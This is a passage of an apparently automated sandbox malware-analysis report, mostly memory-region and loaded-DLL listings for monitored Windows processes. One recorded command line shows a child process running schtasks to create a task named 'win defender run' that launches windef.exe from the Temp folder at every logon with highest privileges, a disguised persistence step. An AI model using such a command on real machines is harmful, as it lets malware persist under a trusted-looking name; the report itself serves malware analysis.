1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1263 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1264 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1265 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1266 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1267 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1268 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1269 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1270 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1271 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1272 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1273 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1274 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1275 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1276 start_va = 0x410000 end_va = 0x414fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1277 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1278 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1279 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1280 start_va = 0x5c0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1281 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1282 start_va = 0x710000 end_va = 0x712fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1283 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1284 start_va = 0x750000 end_va = 0xa86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1285 start_va = 0xa90000 end_va = 0xc17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1286 start_va = 0xc20000 end_va = 0xda0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1287 start_va = 0xdb0000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1288 start_va = 0xeb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1289 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 1290 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1291 start_va = 0x10b0000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 1292 start_va = 0x11b0000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1293 start_va = 0x1230000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 1294 start_va = 0x12b0000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1295 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1296 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1297 start_va = 0x180000000 end_va = 0x180002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1298 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1299 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1300 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1301 start_va = 0x7ff7ef980000 end_va = 0x7ff7ef9fffff monitored = 0 entry_point = 0x7ff7ef995f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1302 start_va = 0x7ffb0a690000 end_va = 0x7ffb0a6a3fff monitored = 0 entry_point = 0x7ffb0a691310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1303 start_va = 0x7ffb0e050000 end_va = 0x7ffb0e05dfff monitored = 0 entry_point = 0x7ffb0e051da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1304 start_va = 0x7ffb0e6a0000 end_va = 0x7ffb0e6aafff monitored = 0 entry_point = 0x7ffb0e6a12b0 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1305 start_va = 0x7ffb10800000 end_va = 0x7ffb109cefff monitored = 0 entry_point = 0x7ffb10827df0 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1306 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1307 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1308 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1309 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1310 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1311 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1312 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1313 start_va = 0x7ffb1ac60000 end_va = 0x7ffb1ac85fff monitored = 0 entry_point = 0x7ffb1ac61cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1314 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1315 start_va = 0x7ffb1e2e0000 end_va = 0x7ffb1e32dfff monitored = 0 entry_point = 0x7ffb1e2f1ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1316 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1317 start_va = 0x7ffb21330000 end_va = 0x7ffb2136dfff monitored = 0 entry_point = 0x7ffb2133a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1318 start_va = 0x7ffb21430000 end_va = 0x7ffb21439fff monitored = 0 entry_point = 0x7ffb21431660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1319 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1320 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1321 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1322 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1323 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1324 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1325 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1326 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1327 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1328 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1329 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1330 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1331 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1332 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1333 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1334 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1335 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1336 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1337 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1338 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1339 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1340 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1341 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1342 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1343 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1344 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1345 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 108 os_tid = 0xb20 Thread: id = 109 os_tid = 0xea8 Thread: id = 110 os_tid = 0xdb4 Thread: id = 111 os_tid = 0xd7c Thread: id = 112 os_tid = 0xc88 Thread: id = 113 os_tid = 0xc84 Thread: id = 114 os_tid = 0xc7c Thread: id = 115 os_tid = 0xc70 Process: id = "9" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x36e2f000" os_pid = "0x1058" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x820" cmd_line = "\"schtasks\" /create /tn \"win defender run\" /sc ONLOGON /tr \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe\" /rl HIGHEST /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1401 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1402 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1403 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1404 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1405 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1406 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1407 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1408 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1409 start_va = 0x3a0000 end_va = 0x3d1fff monitored = 1 entry_point = 0x3c05b0 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 1410 start_va = 0x3e0000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1411 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1412 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1413 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1414 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1415 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1416 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 1417 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1418 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 1419 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1420 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1421 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1422 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1423 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1424 start_va = 0x4600000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1425 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1426 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1427 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1428 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1553 start_va = 0x150000 end_va = 0x20dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1554 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1555 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1556 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1557 start_va = 0x250000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1558 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1559 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1560 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1561 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1562 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1563 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1564 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1565 start_va = 0x290000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1566 start_va = 0x4600000 end_va = 0x46e9fff monitored = 0 entry_point = 0x463d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1567 start_va = 0x47c0000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 1649 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1650 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1651 start_va = 0x48c0000 end_va = 0x4cbafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048c0000" filename = "" Region: id = 1652 start_va = 0x4cc0000 end_va = 0x4ff6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1658 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1659 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1660 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 